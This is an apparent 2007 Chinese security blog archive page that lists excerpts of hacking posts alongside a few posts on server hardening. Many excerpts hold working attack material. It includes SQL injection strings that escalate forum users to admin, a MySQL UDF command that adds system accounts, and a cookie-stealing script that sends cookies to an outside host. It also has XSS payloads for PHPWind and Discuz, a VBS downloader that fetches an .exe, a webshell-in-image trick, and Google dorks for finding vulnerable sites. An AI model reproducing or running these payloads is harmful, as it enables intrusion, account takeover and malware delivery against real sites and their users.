06 2007 档案
虚拟主机的安全配置
摘要:这里就我个人过去的经历和大家一同来探讨有关安全虚拟主机配置的问题。以下以建立一个站点cert.ecjtu.jx.cn为例,跟大家共同探讨虚拟主机配置问题。 一、建立Windows用户 为每个网站单独设置windows用户帐号cert,删除帐号的User组,将cert加入Guest用户组。将用户不能更改密码,密码永不过期两个选项选上。 二、设置文件夹权限 1、设置非站点相关目录权限 ...
阅读全文
Vista致命漏洞 系统10秒钟崩溃
摘要:【eNet硅谷动力消息】据国外媒体报道,微软的新一代操作系统Windows Vista日前曝出了一处致命漏洞,在10秒钟内即可让系统崩溃。 众所周知,Windows Vista的最大卖点之一就是其安全性。微软董事长比尔·盖茨也曾表示,微软在Vista的安全方面下了很大功夫,并与其他安全产品做了详尽的对比。 而事实也似乎证实了与此前的Windows系统相比,Windows Vista的安全性...
阅读全文
关于autorun.inf类病毒和木马彻底的解决办法
摘要:from:网络autorun.inf类病毒和木马相信大家都中过标 一般形式以下载者类木马较为明显 下面ZZ一些方法 希望对大家有用 可以自己测试下 引用 iamcj 原创在前面的Make a anti-autorun batch中,我们讨论了如何通过禁止Shell Hardware Detection服务的方式,来屏蔽光盘/优盘插入时候的自动运行,转载到cnbeta之后,也有相当多的讨论,去掉...
阅读全文
发个辅助注入的Html
摘要:Injection Post Html-----孤独包子The input and output textBY 孤独包子[%5C]
阅读全文
%0a可以做什么
摘要:以通过这个正则表达式但是带入一个%0a,那么很好,漏洞就回到一个%0a能做什么上来了! 黑锅已经总结了一个,在文件扩展后缀里 1.php.jpg不能执行但是 1.php.jpg%0a就可以了(linux环境下) 另外如果在写文件的时候%0a就是一个新行了,对于数据库为文本的就是一个新记录 还有呢?数据库在对待1和1%a的时候是不一样的,1%a被更新到一个int类型的字段可能会导致溢出 ...
阅读全文
XFocus Windows Internet服务器安全配置
摘要:Windows 2003版本区别1)Windows Server 2003, Standard Edition (标准版)针对中小型企业的核心产品,他也是支持双路处理器,4GB的内存。它除了具备 Windows Server 2003 Web Edition 所有功能外,还支持像证书服务、UDDI服务、传真服务、IAS因特网验证服务、可移动存储、RIS、智能卡、终端服务、WMS和 Services...
阅读全文
ms 07-027漏洞
摘要:http://cctmv.com/Browser it And See IT -------------------------------------------Index.htm----------------------------------- FlstX MS07-027 Oday ---------------------------------------------------...
阅读全文
LBS blog sql注射漏洞[All version]
摘要:exp如下 '============================================================================'使用说明:' 在命令提示符下:' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 有效的文章id 要破解的博客用户密码'如:' cscript.exe lbsblog.vbs www.xxxx.com/blo...
阅读全文
一个不错的入侵思路
摘要:几天前费了不少力气拿到一管理员机器,主站我盘旋了很久,没有突破口,开了80,还有一个高端端口,当然就是3389了,一阵欣喜,管理员一定会登这个服务器的3389的。现在机器是拿到了,翻了翻管理员机器里的东西,本来想装键盘记录的,发现有很多以ip命名的rdp文件,下了一个下回来打开看了一下,真幸运,保存了密码在rdp文件里的(这种情况只有读rdp的密码了,键盘记录记不到)。主站和各分站的3389都是以...
阅读全文
oracle常用SQL语句
摘要:1、连接SQL*Plus system/manager2、显示当前连接用户SQL> show user3、查看系统拥有哪些用户SQL> select * from all_users;4、新建用户并授权SQL> create user a identified by a;(默认建在SYSTEM表空间下)SQL> grant connect,resource to a;5、连接到新用户SQL> co...
阅读全文
PJblog跨站漏洞利用及修补
摘要:跨站漏洞成功演示代码: [font=expression(container.document.write(unescape('%3Ciframe%20src%3D%27http%3A//www.godx.cn%27%3E%3C/iframe%3E')))]God[/font] 对策。。。屏蔽关键字如果不用屏蔽关键字的办法, 则使用下面的办法修补漏洞用记事本打开 guestbook.asp 查找...
阅读全文
PHPWind论坛5.3版postupload.php附件文件名跨站脚本漏洞
摘要:注意:这只是个漏洞公告并不是通常意义的原创,因此以执行帐号发布。感谢碎片、老周、ring04h等成员的讨论。邪恶八进制信息安全团队已经将该漏洞提交给PHPWind官方。PHPWind Forums v5.3 postupload.php Cross Site Script(XSS)PHPWind论坛5.3版postupload.php文件跨站脚本漏洞(XSS)漏洞产生:require\postup...
阅读全文
OBLOG4.5 商业SQL版 漏洞解析
摘要:声明:本文乃提供脚本学习 不是为了让大家去黑更多的站而写 漏洞已修补 网上的已经没有有漏洞的站了影响版本:oblog4.5 商业SQL (非Final版)漏洞补丁地址:http://down.oblog.cn/oblog4/patch/Oblog45_Final_Patch0619.rar漏洞文件:api/API_Response.asp打开api/API_Response.asp看开头处====...
阅读全文
动网7.1 sp1 sql 博客漏洞
摘要:对SQL版的动网7.1系统。开放了博客功能登陆http://bbs.xxx.com/bokeindex.asp点“博客管理” 登陆后在点 关键字设置在“链接地址”处写上动网sql注入语句例: 123123'where 1=0;update dv_user set userface=(select top 1 username from dv_user where usercla...
阅读全文
aspx下的log备份
摘要:呵呵经过上次cooldiyer的社会工程学。给我上了一课。这次就不发切图了。方法叙述给大家。http://www.cooldiyer.com/index.aspx (就借用cooldiyer名字做个教程)首先我们暴个路径看看。http://www.cooldiyer.com/~index.aspx成功暴出路径。知道了路径如果是sql的数据库就可以差异备份和log备份。不过今天我们讲的是log备份。...
阅读全文
dxbbs注入漏洞
摘要:影响版本:< dxbbs 7.3 详细说明:在User_Friend.aspx过滤了=Add&Name=admin加上''典型的过滤不严,导致注入漏洞. 参考:http://www.winshell.cn/read.php?5...
阅读全文
动易Region.asp漏洞
摘要:前段时间就知道动易不止一个洞,这又被人放出来,
通杀ACC,MSSQL
http://site.com/region.asp?country=tt&city=whytt&province=shi'
阅读全文
Mysql的提权
摘要:C:\Winnt\udf.dll 2000C:\Windows\udf.dll 2003 现在基本上win的服务器就这两个导出UDF.DLL create function cmdshell returns string soname 'udf.dll'select cmdshell('net user user password /add'); select cmdshell('net ...
阅读全文
关于BBSXP 7.00 BETA2 SQL通杀教程
摘要:芊芊做的教程这里记录一下: 注册---->发帖---->编辑(抓包提交)define:cnsapc为注册用户 bug为帖子内容 提升为管理员:&cnsapc=bug','');update bbsxp_users set userroleid=1 where username='cnsapc'-- 获取后台密码"&cnsapc=bug','');update bbsxp_use...
阅读全文
ShopEx漏洞
摘要:ShopEx 国内市场占有率最高的网店系统.ShopEx是网络购物软件与技术服务全面提供商,ShopEx做为国内购物软件的开拓者和实践者,提供了从购物软件(包括网上商店、网上商城、网上商店多店系统)到相关配套服务(网店推广、模板设计、流量监测、商业智能分析、网上支付、网店互联、购物系统定制开发等)以及深层次的电子商务技术服务。************************************...
阅读全文
错误“未找到提供程序.该程序可能未正确安装”的原因
摘要:网络上有很多帖子谈到ASP页面出现“未找到提供程序.该程序可能未正确安装”错误的原因。 有一种原因却始终没有没提到,那就是权限问题。 OLEDB的相关驱动程序是安装在C:\program files\common files目录下。如果这个目录没有Users的执行权限的话,也会出现这种问题。对于NTFS格式的C盘,权限是需要仔细设置的。如果C:\program files\下所有目录都具有User...
阅读全文
跨站通杀漏洞:支持最新的phpwind等论坛
摘要:只要把后面的域名改成你所要跳转的域名就可以了...支持wmv的论坛如下发帖: [wmv=314,256,1]http://www.rootkit.com.cn/qq.swf?url=http://www.rootkit.com.cn[/wmv] 其他论坛跨站方法大家自己灵活运用了....比如 mp3 wmv flash rm 等代码的支持格式都可以试一下
阅读全文
checkfile
摘要:都是在命令行下校验的校验工具 个人觉得 【 fsum 】尤其强大它支持 md2,md4,md5,sha1,sha256,sha384,sha512,rmd,tiger,panama,adler,crc32,edonkey 共13种方式的校验其校验速度也是相当~~~~地快fsum简单用法fsum -js *.exe -->检测当前目录下所有exe文件 用SFV(CRC32)格式输出fsum -jm ...
阅读全文
Oblog的一些整理
摘要:1、显示,help/h_main.htm的内容,格式:http://test/blog/user_help.asp?file=help/h_whatblog.htm,如果换成asp文件是不是也可以显示?从代码中可以看出,不允许读扩展名为asp的文件,但是对别扩展名没有限制,我们只想要asp文件的内容,windowns不区分文件的大小写,我们把小写的asp换成大写的ASP,读取oBlog的数据库连接...
阅读全文
远程包含漏洞挖掘脚本
摘要:read()){ if((is_dir("$directory/$file")) && ($file!=".") && ($file!="..")) { tree("$directory/$file"); } else{ if($file != "." && $file != ".."&&eregi(".php",$file)){ $fd=r...
阅读全文
phpwind和DZ论坛跨站
摘要:PW论坛的FONT FACE字体没过滤: 跨站代码: 以下是代码片段:[font=expression(alert('XSS'))]xss[/font] DZ论坛的float浮动属性没过滤: 跨站代码 : 以下是代码片段:[float=expression(a...
阅读全文
寻找真正的入口(OEP)--广义ESP定律
摘要:1.前言在论坛上看到很多朋友,不知道什么是ESP定律,ESP的适用范围是什么,ESP定律的原理是什么,如何使用ESP定律?看到了我在http://poptown.gamewan.com/dispbbs.asp?boardID=5&ID=54&page=1调查结果发现,大家对ESP定律很感兴趣,当然因为实在是太好用了,现在我就来告诉大家什么是ESP定律,它的原理是什么!!BTW:在看完了手动脱壳入门...
阅读全文
利用Google进行入侵的原理
摘要:2004年在拉斯维加斯举行的BlackHat大会上,有两位安全专家分别作了名为You found that on google? 和google attacks 的主题演讲。经过安全焦点论坛原版主WLJ翻译整理后,个人觉得有必要补充完善一些细节部分。今天向大家讲述的是Google的又一功能:利用搜索引擎快速查找存在脆弱性的主机以及包含敏感数据的信息,甚至可以直接进行傻瓜入侵。 用google来...
阅读全文
国内所有Mail安全漏洞(GET COOKIE)
摘要:首先偷取Cookie,通过以下脚本引入一个js,document.write(""),然后js内容为: var code; var target = "http://www.loveshell.net/cookie.asp?"; info=escape(document.location+"@@@"+document.cookie); target=target+info; co...
阅读全文
记录存在 XSS漏洞的网站列表
摘要:http://www.xssed.com/archive/special=1/
阅读全文
SQL注入建立虚拟目录
摘要:我们很多情况下都遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,这一招不错:exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'建立虚拟目录win,...
阅读全文
NEWASP 新云CMS BUG
摘要:JUST,DO.IT!I LOVE HACKED DOWN WEBSITE. This is BUG Only For > IIS 6.0 (Windows 2003 ) EXPLIOT: HTTP://WWW.****.COM/(UPLOAD.ASP) You can change upload is filepath…. -_-!! (exmple:upload/*.gif) changed...
阅读全文
突破一流信息监控
摘要:1.一句话 2.图片后门copy *.gif /b + 网马.asp /a Google.gif然后建个ASP文件 !–#include file=”Google.jpg”–注意路径 3.Microsoft.XMLHTTP下载Set xPost = CreateObject("Microsoft.XMLHTTP")xPost.Open "GET","http://xxx/*.txt",F...
阅读全文
沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入利用
摘要:+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2后台“图文管理”里添加文章...
阅读全文
突破动易拿webshell
摘要:原理 : Reg/User_RegCheck.asp 用户名只过滤 cdx,cer,asp,asa突破的前提条件是 : 服务器是win2003 全功能的空间**************************************************'函数名:UserNamefilter('作 用:过滤用户名(增强过滤,用户名现用于建立个人文集目录)'*************...
阅读全文
PHPWind 论坛 (showpic.php)插件漏洞
摘要:showpic.php str=$_SERVER['QUERY_STRING'];$img=base64_decode($str);$codelen=strlen($safeguard);//获取附加码长度$img=substr($img,$codelen); //去掉附加码readfile($img);提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后...
阅读全文
新云网站管理系统最新版注入漏洞
摘要:受影响系统:新云网站管理系统最新版发现人的BLOG:http://sobiny.cn发现日期:2006年10月中旬发布日期:2007年6月上旬安全综述:新云网站管理系统是一个采用ASP和MSSQL等其他多种数据库生成静态页面构建的高效网站解决方案。漏洞描述:先看const.asp的GetUserTodayInfo过程。QUOTE:Lastlogin = Request.Cookies("newas...
阅读全文
对国内主流邮箱的跨站测试
摘要:太恐怖,这可能引起一系列的问题,包括玉米劫持、社会工程学拿密码等等
阅读全文
Http Download VBS!
摘要:Set xPost=createObject("Microsoft.XMLHTTP")xPost.Open "GET","http://www.gwlz.cn/100.exe",0xPost.Send()Set sget=createObject("ADODB.Stream")sget.Mode=3sget.Type=1 sget.opensget.write xpost.responseB...
阅读全文
动易的还是要整理一下
摘要:User/upload.asp?dialogtype=UserBlogpic&size=5 NewComment.asp?ChannelID=1&ModuleName=Article A on C.InfoID=A.ArticleID where A.ChannelID=1 and 1=1 ';mssql语句--
阅读全文
邪恶的空格-PHP本地文件包含漏洞的新突破口!
摘要:http://www.exp.com/index.php这样的GET请求,将一句话木马写入web日志,然后利用文件包含漏洞包含日志得到WEBSHELL,如milw0rm上的这个EXP:http://www.milw0rm.com/exploits/4029不过很遗憾,这类情况只能在short_open_tag=on的情况下才能有效,当short_open_tag=off时,PHP将不支持这样的短语...
阅读全文
脚本漏洞不完全挖掘脚本
摘要:";echo "Editor By:Ivory AT 77169.com";echo "";echo "";echo "=========================================================================";foreach($script_array as $value) {$fuckurl=$baseurl.$value;$temp=...
阅读全文
Windows FTP SERVER允许匿名登陆ftp服务器危险性研究
摘要:对于缺乏网络安全意识的网络管理员,在配置windows服务器时往往只是让web服务器能工作起来,并且打了一些常见的补丁,就认为这个服务器是很安全的了。其实也不然,当他没有注重ftp的匿名登陆的危险时,就可能产生严重漏洞。(关于此危险请参考我发表的一篇文章《关于www.apache.org被入侵的联想》)下面我们将以一个...
阅读全文
45种可以拿到Webshell的程序
摘要:1,到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!2,到Google ,site:cq.cn inurl:asp3,利用挖掘鸡和一个ASP木马.文件名是login.asp路径组是/manage/关键词是went.asp用'or'='or'来登陆4,关键字:Co Net MIB Ver 1.0网站后台管理系统帐号密码为 'or'='or'5.动感购物系统i...
阅读全文
Microsoft IIS<=5.1点击高亮验证绕过漏洞
摘要:影响版本:Microsoft IIS 5.1+ Microsoft Windows XP 64-bit Edition SP1+ Microsoft Windows XP 64-bit Edition- Microsoft Windows XP Home SP1- Microsoft Windows XP Home+ Microsoft Windows XP Professional SP1+ M...
阅读全文
Web迅雷(xunlei)0day漏洞曝光
摘要:一、事件分析: DSW Lab AVERT小组监测到一个高度危险讯雷漏洞被曝光,该漏洞发生在Web迅雷的一个控件上,当安装了W...
阅读全文
X-Space XSS 0Day
摘要:XSS 此处脚本漏洞存在有一定的风险,可能导致挂马,威胁到用户,密码,COOKIE等敏感信息,已通知官方处理等待更新程序.
阅读全文
浙公网安备 33010602011771号